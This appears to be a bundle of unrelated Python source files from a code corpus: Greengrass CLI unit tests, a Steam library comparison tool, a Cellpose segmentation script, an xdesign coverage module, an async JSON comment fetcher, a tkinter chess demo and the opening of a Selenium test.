    # and neither init helper is invoked.
    test_d_args = {"language": None, "template": None, "repository": None}
    mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
    mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
    mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
    with pytest.raises(Exception) as e:
        init.run(test_d_args)
    assert e.value.args[0] == error_messages.INIT_WITH_INVALID_ARGS
    assert mock_is_directory_empty.call_count == 1
    assert mock_init_with_template.call_count == 0
    assert mock_init_with_repository.call_count == 0
def test_init_with_template_valid(mocker):
    # download_and_clean must be called with "<template>-<language>" as the
    # name and "template" as the component kind.
    template = "template"
    language = "language"
    mock_download_and_clean = mocker.patch("gdk.commands.component.init.download_and_clean", return_value=None)
    init.init_with_template(template, language)
    mock_download_and_clean.assert_any_call("template-language", "template")
def test_init_with_template_exception(mocker):
    # An HTTPError from download_and_clean is wrapped into an exception whose
    # message mentions the failed template initialization.
    template = "template"
    language = "language"
    mock_download_and_clean = mocker.patch(
        "gdk.commands.component.init.download_and_clean", side_effect=HTTPError("Some error")
    )
    with pytest.raises(Exception) as e:
        init.init_with_template(template, language)
    assert "Could not initialize the project with component template" in e.value.args[0]
    mock_download_and_clean.assert_any_call("template-language", "template")
def test_init_with_repository_valid(mocker):
    # download_and_clean must be called with the repository name and the
    # "repository" component kind.
    repository = "repository_name"
    mock_download_and_clean = mocker.patch("gdk.commands.component.init.download_and_clean", return_value=None)
    init.init_with_repository(repository)
    mock_download_and_clean.assert_any_call(repository, "repository")
def test_init_with_repository_exception(mocker):
    # An HTTPError from download_and_clean is wrapped into an exception whose
    # message mentions the failed repository initialization.
    repository = "repository_name"
    mock_download_and_clean = mocker.patch(
        "gdk.commands.component.init.download_and_clean", side_effect=HTTPError("Some error")
    )
    with pytest.raises(Exception) as e:
        init.init_with_repository(repository)
    assert "Could not initialize the project with component repository" in e.value.args[0]
    mock_download_and_clean.assert_any_call(repository, "repository")
@patch("zipfile.ZipFile")
def test_download_and_clean_valid(mock_zip, mocker):
    # Happy path: the template zip is downloaded, extracted, and its single
    # top-level folder is moved into the current directory.
    mock_get_available_templates = mocker.patch(
        "gdk.commands.component.list.get_component_list_from_github",
        return_value={"template-language": "template-url"},
    )
    mock_response = mocker.Mock(status_code=200, content="".encode())
    mock_template_download = mocker.patch("requests.get", return_value=mock_response)
    mock_za = Mock()
    mock_za.return_value.namelist.return_value = ["one"]
    mock_za.return_value.extractall.return_value = None
    mock_zip.return_value.__enter__ = mock_za
    mock_iter_dir = mocker.patch("pathlib.Path.iterdir", return_value=["dummy-folder1"])
    mock_move = mocker.patch("shutil.move", return_value=None)
    init.download_and_clean("template-language", "template")
    assert mock_iter_dir.call_count == 1
    assert mock_move.call_count == 1
    mock_move.assert_any_call("dummy-folder1", Path(".").resolve())
    assert mock_template_download.call_count == 1
    assert mock_get_available_templates.call_count == 1
def test_init_with_template_invalid_url(mocker):
    # Raises an exception when the template url is not valid.
    # No file may be written when the download fails with a non-200 status.
    template = "template"
    language = "language"
    formatted_template_name = f"{template}-{language}"
    mock_get_available_templates = mocker.patch(
        "gdk.commands.component.list.get_component_list_from_github",
        return_value={formatted_template_name: "template-url"},
    )
    mock_response = mocker.Mock(status_code=404, raise_for_status=mocker.Mock(side_effect=HTTPError("some error")))
    mock_template_download = mocker.patch("requests.get", return_value=mock_response)
    with patch("builtins.open", mock_open()) as mock_file:
        with pytest.raises(Exception) as e:
            init.download_and_clean(formatted_template_name, template)
        assert "Failed to download the selected component" in e.value.args[0]
        assert mock_template_download.call_count == 1
        assert mock_get_available_templates.call_count == 1
        assert not mock_file.called
def test_get_download_url_valid_template(mocker):
    # A known template name resolves to its catalog URL.
    template = "template"
    language = "language"
    formatted_template_name = f"{template}-{language}"
    mock_get_component_list_from_github = mocker.patch(
        "gdk.commands.component.list.get_component_list_from_github",
        return_value={formatted_template_name: "template-url"},
    )
    url = init.get_download_url(formatted_template_name, "template")
    assert url == "template-url"
    assert mock_get_component_list_from_github.called
def test_get_download_url_valid_repository(mocker):
    # A known repository name resolves to its catalog URL.
    repository = "repository_name"
    mock_get_component_list_from_github = mocker.patch(
        "gdk.commands.component.list.get_component_list_from_github",
        return_value={"repository_name": "repository-url"},
    )
    url = init.get_download_url(repository, "repository")
    assert url == "repository-url"
    assert mock_get_component_list_from_github.called
def test_get_download_url_invalid_template(mocker):
    # An unknown template name raises with a catalog-lookup error message.
    template = "template-language"
    mock_get_component_list_from_github = mocker.patch(
        "gdk.commands.component.list.get_component_list_from_github",
        return_value={"repository_name": "repository-url"},
    )
    with pytest.raises(Exception) as e:
        init.get_download_url(template, "template")
    assert e.value.args[0] == "Could not find the component template 'template-language' in Greengrass Software Catalog."
    assert mock_get_component_list_from_github.called
def test_get_download_url_invalid_repository(mocker):
    # An unknown repository name raises with a catalog-lookup error message.
    repository = "repository_name"
    mock_get_component_list_from_github = mocker.patch(
        "gdk.commands.component.list.get_component_list_from_github",
        return_value={"template-language": "template-url"},
    )
    with pytest.raises(Exception) as e:
        init.get_download_url(repository, "repository")
    assert e.value.args[0] == "Could not find the component repository 'repository_name' in Greengrass Software Catalog."
    assert mock_get_component_list_from_github.called
|
<gh_stars>1-10
from collections.abc import Iterable
import requests
import argparse
import steamid
import urllib
# Command-line interface: requires a Steam Web API key and at least one Steam
# ID in any supported format. Parsed eagerly at import time, so importing this
# module without arguments exits with a usage error.
parser = argparse.ArgumentParser(description="Look up and compare Steam users' libraries")
parser.add_argument('--api-key', type=str, dest='apikey', required=True, help='Your Steam API key; see https://steamcommunity.com/dev/apikey')
parser.add_argument('steamid', type=str, nargs='+', help='A Steam ID to add to the comparison list. Accepts any format (vanity URL, Steam ID, SteamID64, etc)')
args = parser.parse_args()
# Module-level API key used by steam_request below.
apikey = args.apikey
def steam_request(endpoint: str, params: dict[str, str]):
    """Generic method to perform a request to Steam's public API.

    Parameters
    ----------
    endpoint : str
        The endpoint to hit, e.g. ``'IPlayerService/GetOwnedGames/v0001'``

    params : dict[str, str]
        The query parameters to pass to requests; the API key and the
        ``format=json`` flag are merged in automatically

    Returns
    -------
    The JSON-decoded body of the returned response

    Raises
    ------
    requests.RequestException
        If any failures occurred while making the request
    """
    # BUG FIX: the return annotation was `-> any`, which refers to the builtin
    # function `any`, not `typing.Any`; the annotation is removed rather than
    # pulling in a typing import.
    query = {**params, 'key': apikey, 'format': 'json'}
    response = requests.get(f'https://api.steampowered.com/{endpoint}/', query)
    response.raise_for_status()
    return response.json()
def get_games_for_steamid(steamid: str) -> set[tuple[int, str]]:
    """Fetch the library of a Steam user.

    Parameters
    ----------
    steamid : str
        The user's 64-bit Steam ID

    Returns
    -------
    set[tuple[int, str]]
        The set of games this user owns, in tuples of appid and game name
    """
    body = steam_request('IPlayerService/GetOwnedGames/v0001', params={
        'include_appinfo': True, 'steamid': steamid
    })
    owned = body['response']['games']
    return {(entry['appid'], entry['name']) for entry in owned}
def convert_to_steamid64(possible_steamid: str) -> str:
    """Attempts to convert a Steam ID or vanity URL into a 64-bit Steam ID

    First, this attempts to parse the Steam ID into any known format, and convert that into a
    64-bit Steam ID. Failing that, this will issue a request to Steam in order to resolve the
    string as a vanity URL.

    Parameters
    ----------
    possible_steamid : str
        The string to convert. Can be a Steam ID or a vanity URL.

    Returns
    -------
    str
        The 64-bit Steam ID of the found user
    """
    # If a full steamcommunity.com profile URL was given, strip it down to the
    # ID/vanity component of the path.
    as_url = urllib.parse.urlparse(possible_steamid)
    if as_url.scheme in ['http', 'https'] and as_url.netloc == 'steamcommunity.com':
        path_components = [c for c in as_url.path.split('/') if c != '']
        if len(path_components) == 2 and path_components[0] in ['profiles', 'id']:
            possible_steamid = path_components[1]
        else:
            raise RuntimeError('Invalid Steam URL format: ' + possible_steamid)
    try:
        # presumably the steamid library raises ValueError on unparseable
        # input and toString() yields the SteamID64 form — TODO confirm
        # against the pinned steamid package version.
        sid = steamid.SteamID(possible_steamid)
        return sid.toString()
    except ValueError:
        # Fall back to resolving the string as a vanity URL via the API.
        return steam_request('ISteamUser/ResolveVanityURL/v1', params={
            'vanityurl': possible_steamid
        })['response']['steamid']
def get_names_from_steamids(steamids: Iterable[str]) -> dict[str, str]:
    """Look up the display names of all provided users.

    Parameters
    ----------
    steamids : Iterable[str]
        The 64-bit Steam IDs to fetch the names of

    Returns
    -------
    dict[str, str]
        Display names of the users, keyed by their Steam IDs
    """
    body = steam_request('ISteamUser/GetPlayerSummaries/v2', params={
        'steamids': ','.join(steamids)
    })
    summaries = body['response']['players']
    return {summary['steamid']: summary['personaname'] for summary in summaries}
def print_games(games: set[tuple[int, str]]):
    """Print each game name on its own line, alphabetically, then a blank line."""
    alphabetical = sorted(games, key=lambda entry: entry[1])
    for _appid, name in alphabetical:
        print(f' - {name}')
    print()
# Resolve every command-line identifier to a 64-bit Steam ID, then fetch the
# display name and owned-game set for each user.
steamids = [convert_to_steamid64(sid) for sid in args.steamid]
steamid_names = get_names_from_steamids(steamids)
steamid_games = { steamid: get_games_for_steamid(steamid) for steamid in steamids }
# Games owned by every user in the comparison list.
common_games = set.intersection(*steamid_games.values())
# NOTE(review): the loop variable `steamid` shadows the imported `steamid`
# module; harmless here because the module is not used after this point, but
# worth renaming.
for steamid in steamids:
    header = f"{steamid_names[steamid]}'s games"
    print(header)
    print('-' * len(header))
    print_games(steamid_games[steamid])
# Only print the intersection when more than one user was given.
if len(steamids) > 1:
    print('Games in common')
    print('---------------')
    print_games(common_games)
|
from skimage.morphology import closing, square, remove_small_objects
from skimage.measure import label
from skimage.segmentation import clear_border
from skimage.filters import threshold_otsu
import os
import numpy as np
import matplotlib.pyplot as plt
import skimage.io
from cellpose import models
from cellpose import plot
import collections
# Input/output locations for this analysis step. The f-prefixes were dropped
# because the strings contain no placeholders.
input_folder = 'results/example_diffuse-FRET/initial_cleanup/'
output_folder = 'results/example_diffuse-FRET/cellpose_masking/'
# makedirs with exist_ok replaces the exists()/mkdir pair: it also creates
# missing parent directories and is race-free.
os.makedirs(output_folder, exist_ok=True)
def apply_cellpose(images, image_type='cyto', channels=None, diameter=None):
    """Apply model to list of images. Returns masks, flows, styles, diams.

    - model type is 'cyto' or 'nuclei'
    - define CHANNELS to run segementation on (grayscale=0, R=1, G=2, B=3) where
      channels = [cytoplasm, nucleus]. If NUCLEUS channel does not exist, set the
      second channel to 0. Defaults to [0, 0] (both grayscale).
    - diameter is the expected object size in pixels, or None to auto-estimate.
    """
    # BUG FIX: avoid the mutable default argument; a fresh [0, 0] is created
    # per call instead of sharing one list across all calls.
    if channels is None:
        channels = [0, 0]
    model = models.Cellpose(model_type=image_type)
    masks, flows, styles, diams = model.eval(images, diameter=diameter, channels=channels)
    return masks, flows, styles, diams
def visualise_cell_pose(images, masks, flows, channels=None):
    """Display cellpose segmentation results for each image.

    One matplotlib figure per image is shown, combining the raw image, its
    mask and the first flow component via cellpose's show_segmentation.
    """
    # BUG FIX: avoid the mutable default argument; a fresh [0, 0] is created
    # per call instead of sharing one list across all calls.
    if channels is None:
        channels = [0, 0]
    for image_number, image in enumerate(images):
        maski = masks[image_number]
        flowi = flows[image_number][0]
        fig = plt.figure(figsize=(12, 5))
        plot.show_segmentation(fig, image, maski, flowi, channels=channels)
        plt.tight_layout()
        plt.show()
def edge_filter(mask):
    """Collect boundary pixel values for all edges, return unique values
    which correspond to cells that are touching/over the edge boundaries.

    BUG FIX: the original used mask.shape[0] for both axes, so for non-square
    masks the right/bottom edges were sliced out of range (silently yielding
    empty edges). Each axis now uses its own extent via -1 indexing.
    """
    top = set(mask[0, :].tolist())
    bottom = set(mask[-1, :].tolist())
    left = set(mask[:, 0].tolist())
    right = set(mask[:, -1].tolist())
    return top | bottom | left | right
def size_filter(mask, lower_size=1500, upper_size=10000):
    """Collect cells that are outside the cell size bounds as those to
    be excluded.

    A cell's size is its pixel count in the labelled mask; cells smaller than
    lower_size or larger than upper_size are returned for exclusion.
    """
    # Renamed the counts dict: the original `cell_size` dict was shadowed by
    # the comprehension's `cell_size` loop variable.
    pixel_counts = collections.Counter(mask.flatten().tolist())
    return {
        cell_number
        for cell_number, count in pixel_counts.items()
        if count < lower_size or count > upper_size
    }
# --------------------------------------Initialise file list--------------------------------------
file_list = [filename for filename in os.listdir(input_folder) if '.tif' in filename]
# reading in all channels for each image, and transposing to correct dimension of array
# BUG FIX: the imread path had lost its filename placeholder; each image is
# read from the input folder by its own name.
imgs = [skimage.io.imread(f'{input_folder}{filename}').transpose(1, 2, 0) for filename in file_list]
# clean filenames
img_names = [filename.replace('.tif', '') for filename in file_list]
# -----------------------Complete cellpose with cytoplasm channel---------------------------------
# channel 0: Venus ----> use this for making masks
# channel 1: Bright field
# channel 2: mTFP
# channel 3: FRET
# channel 4: inclusions
# collecting only channel 0's for masking
cytoplasm_images = [image[:, :, 0] for image in imgs]
plt.imshow(cytoplasm_images[0])
# Apply cellpose then visualise
masks, flows, styles, diams = apply_cellpose(cytoplasm_images, image_type='cyto', diameter=50)
visualise_cell_pose(cytoplasm_images, masks, flows, channels=[0, 0])
# -----------------------If NES image, use inversion of venus channel to define nuclei---------------------------------
# NOTE(review): 65000 appears to be an approximate 16-bit intensity ceiling
# (cf. 65535) used to invert the Venus channel — confirm against the data.
nuc_masks, nuc_flows, nuc_styles, nuc_diams = apply_cellpose([65000 - array for array in cytoplasm_images], image_type='nuclei', diameter=20)
visualise_cell_pose([65000 - array for array in cytoplasm_images], nuc_masks, nuc_flows, channels=[0, 0])
# -----------------------outline inclusions---------------------------------
incl_images = [image[:, :, 4] for image in imgs]
plt.imshow(incl_images[0])
incl_masks, incl_flows, incl_styles, incl_diams = apply_cellpose(incl_images, image_type='nuclei', diameter=20)
visualise_cell_pose(incl_images, incl_masks, incl_flows, channels=[0, 0])
# save associated cell mask arrays
np.save(f'{output_folder}cellpose_masks.npy', masks)
np.save(f'{output_folder}cellpose_nuclei.npy', nuc_masks)
np.save(f'{output_folder}cellpose_inclusions.npy', incl_masks)
|
<gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# #########################################################################
# Copyright (c) 2016, UChicago Argonne, LLC. All rights reserved. #
# #
# Copyright 2016. UChicago Argonne, LLC. This software was produced #
# under U.S. Government contract DE-AC02-06CH11357 for Argonne National #
# Laboratory (ANL), which is operated by UChicago Argonne, LLC for the #
# U.S. Department of Energy. The U.S. Government has rights to use, #
# reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR #
# UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR #
# ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is #
# modified to produce derivative works, such modified software should #
# be clearly marked, so as not to confuse it with the version available #
# from ANL. #
# #
# Additionally, redistribution and use in source and binary forms, with #
# or without modification, are permitted provided that the following #
# conditions are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of UChicago Argonne, LLC, Argonne National #
# Laboratory, ANL, the U.S. Government, nor the names of its #
# contributors may be used to endorse or promote products derived #
# from this software without specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago #
# Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
# #########################################################################
"""Objects and methods for computing coverage based quality metrics.
These methods are based on the scanning trajectory only.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright (c) 2016, UChicago Argonne, LLC."
__docformat__ = 'restructuredtext en'
__all__ = ['coverage_approx']
import logging

import numpy as np

from xdesign.acquisition import beamintersect, thv_to_zxy
from xdesign.recon import get_mids_and_lengths
logger = logging.getLogger(__name__)
def tensor_at_angle(angle, magnitude):
"""Return 2D tensor(s) with magnitude(s) at the angle [rad]."""
R = np.array([[np.cos(angle), -np.sin(angle)],
[np.sin(angle), np.cos(angle)]])
tensor = np.array([[1, 0], [0, 0]])
tensor = np.einsum('...,jk->...jk', magnitude, tensor)
return np.einsum('ij,...jk,lk->...il', R, tensor, R)
def coverage_approx(
    gmin,
    gsize,
    ngrid,
    probe_size,
    theta,
    h,
    v,
    weights=None,
    anisotropy=1,
    num_rays=16
):
    """Approximate procedure coverage with a Riemann sum.

    The intersection between the beam and each pixel is approximated by using a
    Riemann sum of `num_rays` rectangles: width `probe_size / num_rays` and
    length `dist` where `dist` is the length of the segment of the ray which
    passes through the pixel parallel to the beam.

    If `anisotropy` is greater than 1, then `coverage_map.shape` is
    `(M, N, anisotropy)`, where the last dimension bins coverage by beam angle
    so that directional (anisotropic) coverage can be inspected.

    Parameters
    ----------
    gmin : array-like [cm]
        Minimum corner `(x, y)` of the rectangular region to map.
    gsize : array-like [cm]
        Extent `(width, height)` of the region.
    ngrid : array-like
        Number of pixels `(M, N)` of the coverage map along each axis.
    probe_size : float [cm]
        Width of the probe beam.
    theta, h, v : :py:class:`numpy.ndarray`
        Trajectory coordinates (rotation angle and two translations),
        converted to x, y, z positions via `thv_to_zxy`. All three must have
        the same number of elements.
    weights : :py:class:`numpy.ndarray`, optional
        Per-position coverage weights; defaults to all ones.
    anisotropy : int
        Number of angular bins in the last axis of the coverage map.
    num_rays : int
        The number of rays used to approximate each beam.

    Returns
    -------
    coverage_map : :py:class:`numpy.ndarray`
        A discretized map of the Probe coverage.

    See also
    --------
    :py:func:`.plot.plot_coverage_anisotropy`
    """
    if weights is None:
        weights = np.ones(theta.shape)
    assert weights.size == theta.size == h.size == v.size, "theta, h, v must be" \
        "the equal lengths"
    coverage_map = np.zeros(list(ngrid) + [anisotropy])
    # split the probe up into bunches of rays
    line_offsets = np.linspace(0, probe_size, num_rays) - probe_size / 2
    # Replicate each trajectory position once per ray, offsetting h so the
    # rays span the probe width.
    theta = np.repeat(theta.flatten(), line_offsets.size)
    h = h.reshape(h.size, 1) + line_offsets
    h = h.flatten()
    v = np.repeat(v.flatten(), line_offsets.size)
    weights = np.repeat(weights.flatten(), line_offsets.size)
    # Convert from theta,h,v to x,y,z
    srcx, srcy, detx, dety, z = thv_to_zxy(theta, h, v)
    # grid frame (gx, gy): pixel boundary coordinates along each axis
    sx, sy = ngrid[0], ngrid[1]
    gx = np.linspace(gmin[0], gmin[0] + gsize[0], sx + 1, endpoint=True)
    gy = np.linspace(gmin[1], gmin[1] + gsize[1], sy + 1, endpoint=True)
    for m in range(theta.size):
        # get intersection locations and lengths
        xm, ym, dist = get_mids_and_lengths(
            srcx[m], srcy[m], detx[m], dety[m], gx, gy
        )
        if np.any(dist > 0):
            # convert midpoints of line segments to indices
            ix = np.floor(sx * (xm - gmin[0]) / gsize[0]).astype('int')
            iy = np.floor(sy * (ym - gmin[1]) / gsize[1]).astype('int')
            # angular bin for this ray's direction
            ia = np.floor((theta[m] / (np.pi / anisotropy) % anisotropy)
                          ).astype('int')
            # keep only segments that actually fall inside the grid
            ind = (dist != 0) & (0 <= ix) & (ix < sx) \
                & (0 <= iy) & (iy < sy)
            # put the weights in the bin
            coverage_map[ix[ind], iy[ind], ia] += dist[ind] * weights[m]
    # Normalize: each ray contributes its width, and coverage is per unit
    # pixel area.
    pixel_area = np.prod(gsize) / np.prod(ngrid)
    line_width = probe_size / num_rays
    return coverage_map * line_width / pixel_area
|
<reponame>evilyach/comment-tree-py<gh_stars>0
#!/usr/bin/python3
import argparse
import json
import sys
import select
import aiohttp
import asyncio
import copy
class CommentTree:
    ''' Class to add comments to an existing JSON file. '''

    def __init__(self, filename):
        '''
        Object constructor.

        Args:
            filename (str): Name of a JSON file.

        Attributes:
            filename (str): Name of a JSON file.
            json_data (dict): A JSON file represented in a Python dictionary.
            bodies (dict): Fetched comment bodies, keyed by post id.
            urls (list<str>): A list of URLs to fetch comment bodies from.
        '''
        self.filename = filename
        self.json_data = self.get_json_data(self.filename)
        if self.json_data is None:
            return
        self.bodies = {}
        self.urls = []
        self.process(self.json_data)

    def __str__(self):
        ''' Returns string representation of a Comment Tree '''
        return json.dumps(self.json_data, indent=4)

    def get_json_data(self, filename):
        '''
        Get JSON data from any stdin source.

        Can either provide data via pipe:
            $ cat ./test/test.json | ./comment-tree.py
        or via command line argument:
            $ ./comment-tree.py --file ./test/test.json

        We check if there is stdin data by using select. That, unfortunately, only
        works on *nix machines and looks very ugly.

        Args:
            filename (str): Name of a JSON file.

        Returns:
            dict: A JSON file represented in a Python dictionary, or None when
            nothing could be read.
        '''
        if filename:
            with open(filename) as json_file:
                try:
                    return json.load(json_file)
                # BUG FIX: was a bare `except`, and the error message had lost
                # its placeholder; catch only decoding errors and name the file.
                except (json.JSONDecodeError, UnicodeDecodeError):
                    print(f"Could not read any JSON data from '{filename}'!")
                    return None
        # This select is the only way I found to check if stdin is empty or not
        elif select.select([sys.stdin, ], [], [], 0.0)[0]:
            try:
                return json.load(sys.stdin)
            # BUG FIX: narrowed from a bare `except`.
            except (json.JSONDecodeError, UnicodeDecodeError):
                print('Could not read any JSON data from stdin!')
                return None
        else:
            print(f"No input data was provided! Check '{sys.argv[0]} --help'")
            return None

    def get_urls(self, data):
        '''
        Iterate through a JSON tree and get id values to form a URLs list.

        Args:
            data (dict): a JSON tree to get id values from.
        '''
        for key, value in data.items():
            if key == 'id':
                self.urls.append(
                    f'https://jsonplaceholder.typicode.com/posts/{value}')
            if key == 'replies':
                for element in value:
                    self.get_urls(element)

    def add_comments(self, data):
        '''
        Iterate through a JSON tree and put comment bodies into it.

        Args:
            data (dict): a JSON tree to put comment bodies into.
        '''
        # Iterate over a copy because 'body' is inserted during the walk.
        for key, value in data.copy().items():
            if key == 'id':
                # Only attach a body when the fetch actually returned one.
                if self.bodies[value]:
                    data['body'] = self.bodies[value]
            if key == 'replies':
                for element in value:
                    self.add_comments(element)

    async def fetch(self, url, session):
        '''
        Fetch data from URL inside a session.

        This function only uses 'id' and 'body' fields.

        Args:
            url (str): a URL to fetch data from.
            session (aiohttp.client.ClientSession): a client session.
        '''
        async with session.get(url) as response:
            data = await response.json()
            # BUG FIX: the original indexed data['id'] even in the empty
            # branch, which raised instead of recording a missing body. The
            # post id is taken from the URL so empty responses map to None.
            post_id = int(url.rstrip('/').rsplit('/', 1)[-1])
            self.bodies[post_id] = data['body'] if data else None

    async def bound_fetch(self, semaphore, url, session):
        '''
        Invokes a fetch guarded with a semaphore.

        Args:
            semaphore (asyncio.locks.Semaphore): a semaphore guard.
            url (str): a URL to fetch data from.
            session (aiohttp.client.ClientSession): a client session.
        '''
        async with semaphore:
            await self.fetch(url, session)

    async def run(self):
        ''' Builds a session which invokes asyncronous calls to fetch data. '''
        semaphore_count = 1000
        tasks = []
        semaphore = asyncio.Semaphore(semaphore_count)
        async with aiohttp.ClientSession() as session:
            for url in self.urls:
                task = asyncio.ensure_future(
                    self.bound_fetch(semaphore, url, session))
                tasks.append(task)
            await asyncio.gather(*tasks)

    def process(self, data):
        '''
        Add comment bodies to a JSON dict.

        It works by iterating through the JSON tree and retrieving data using
        JSON placeholder API.

        Args:
            data (dict): A JSON represented in a Python dictionary.
        '''
        # The first run is to get the indeces for URLs
        self.get_urls(self.json_data)
        # Fetch URLs asynchronously
        # NOTE(review): get_event_loop() is deprecated for this use since
        # Python 3.10; asyncio.run(self.run()) is the modern equivalent.
        loop = asyncio.get_event_loop()
        future = asyncio.ensure_future(self.run())
        loop.run_until_complete(future)
        # The second run is to add comment bodies
        self.add_comments(self.json_data)
def parse_args():
    '''
    Parse command line arguments.

    Returns:
        argparse.Namespace: Command line arguments
    '''
    arg_parser = argparse.ArgumentParser(description='Get comments for you JSON file')
    arg_parser.add_argument('--file', type=str, help='input JSON filename')
    arg_parser.add_argument('--save', type=str, help='output JSON filename')
    return arg_parser.parse_args()
def main():
    ''' Entry point of an app '''
    args = parse_args()
    tree = CommentTree(args.file)
    if args.save:
        # Persist the annotated tree when an output file was requested...
        with open(args.save, "w+") as json_file:
            json_file.write(str(tree))
    else:
        # ...otherwise dump it to stdout.
        print(tree)


if __name__ == "__main__":
    main()
|
# chessgame.py
# Copyright 2021 <NAME>
# Licence: See LICENCE (BSD licence)
"""Demonstrate chess game class and methods to display PGN text, board, and
analysis as it appears without an active chess engine."""
if __name__ == "__main__":
    # Demo entry point: builds a Tk window showing one hard-coded PGN game
    # using stub ("Duck") objects in place of the real chess UI plumbing.
    import tkinter
    from pgn_read.core.parser import PGN
    from ..gui import fonts
    from ..gui.game import Game
    from .chessscore import DuckUI
    class DuckStatusbar:
        """Helper to allow Game instances to work without a real UI."""
        def set_status_text(self, *a, **k):
            # Intentionally a no-op: the demo has no status bar to update.
            pass
    class DuckqueueQueue:
        """Helper to allow Game instances to work without a real UI."""
        def put(self, *a):
            # Intentionally a no-op: queued analysis items are discarded.
            pass
    class DuckcoreuciUCI:
        """Helper to allow Game instances to work without a real UI."""
        ui_analysis_queue = DuckqueueQueue()
        position_analysis = {}
    class DuckguiuciUCI:
        """Helper to allow Game instances to work without a real UI."""
        uci = DuckcoreuciUCI()
    class DuckUI(DuckUI):
        """Helper to allow Game instances to work without a real UI."""
        show_analysis = True
        visible_scrollbars = True
        # None is legal but the default analysis does not get shown in the
        # analysis widget.
        database = False
        def make_position_analysis_data_source(self):
            return None
        statusbar = DuckStatusbar()
        uci = DuckguiuciUCI()
    # Maybe the real generate_popup_navigation_maps can be declared somewhere
    # else, even if duplicated, to avoid this.
    # An empty Navigation entry is put in the popup menu.
    class Game(Game):
        binding_labels = ()
        def generate_popup_navigation_maps(self):
            return {}, {}
    root = tkinter.Tk()
    root.wm_minsize(width=900, height=600)
    f = fonts.make_chess_fonts(root)
    root.wm_title("Demonstrate Game")
    root.pack_propagate(False)
    # Use DuckUI.
    g = Game(master=root, ui=DuckUI(root))
    del f
    # Parse a single PGN game that deliberately exercises awkward syntax:
    # variations, comments, escape lines, and reserved "<...>" tokens.
    g.collected_game = next(
        PGN().read_games(
            "".join(
                (
                    '[Event"National Club: Gosport - Wood Green"]',
                    '[Site"Gosport"]',
                    '[Date"1989-05-07"]',
                    '[Round"QFinal"]',
                    '[White"S<NAME> J"]',
                    '[Black"Marsh R"]',
                    '[Result"1-0"]',
                    "e4(d4d5c4e6Nc3)c6d4d5exd5cxd5c4Nf6c5e6Nc3b6b4a5Bf4",
                    "axb4Nb5Na6Qa4;comment to eol\nBd7",
                    "Bc7Nxc5Qd1Qc8dxc5bxc5Nf3Qb7Nd6Bxd6Bxd6Qb6Be5Ke7Be2Ne4O-Of6Bb2Nc3",
                    "Bxc3bxc3Qd3(Qb3)Ra3Rfb1Qa7Qc2g6Rb3d4Bc4Rxb3Bxb3Qa6a4Rb8a5e5Bd5",
                    "\n%The escape sequence\nRb2",
                    "Qe4Bf5Qh4Qd3(c2(g5)Nd2Qxa5Rxa5Rb1{Comment\ncontaining newline}Nf1",
                    "(Nxb1c1=Q)Rxf1Kxf1Bd3)g4Rb1",
                    "Rxb1Qxb1Kg2Kd6Qxf6Kxd5<reserved\n\nfor future use>Qxe5",
                    "Kc6gxf5Qxf5Qe8Kc7Qe7Kc8Ne5c2Qxc5Kd8Qxd4",
                    "Ke8Qe3Kf8Kg3Qc8Nd3Kg8f4Qc6Nc1Qa4Qb3",
                    "1-0",
                    "\n",
                )
            )
        )
    )
    g.set_and_tag_item_text()
    # The get_top_widget method and takefocus_widget attribute are defined in
    # Game class to keep them out of AnalysisScore instances.
    g.get_top_widget().pack(fill=tkinter.BOTH, expand=tkinter.TRUE)
    g.score.focus_set()
    del g
    root.mainloop()
|
import unittest
import re
from time import sleep
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support import expected_conditions as econd
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
import apiritif
import selenium_taurus_extras
# Shared template-variable store; _tpl substitutes ${...} placeholders from
# _vars when locators and expected values are applied in the tests below.
_vars = {}
_tpl = selenium_taurus_extras.Template(_vars)
_vars['name'] = 'Name'
_vars['red_pill'] = 'take_it'
class TestRequests(unittest.TestCase):
    def setUp(self):
        """Create the Firefox webdriver session used by each test."""
        options = webdriver.FirefoxOptions()
        profile = webdriver.FirefoxProfile()
        # Route the webdriver log to a fixed location for debugging.
        profile.set_preference('webdriver.log.file', '<somewhere>/webdriver.log')
        # NOTE(review): `firefox_options=` is the Selenium 3 keyword; newer
        # Selenium versions expect `options=` — confirm the pinned version.
        self.driver = webdriver.Firefox(profile, firefox_options=options)
        self.driver.implicitly_wait(3.5)
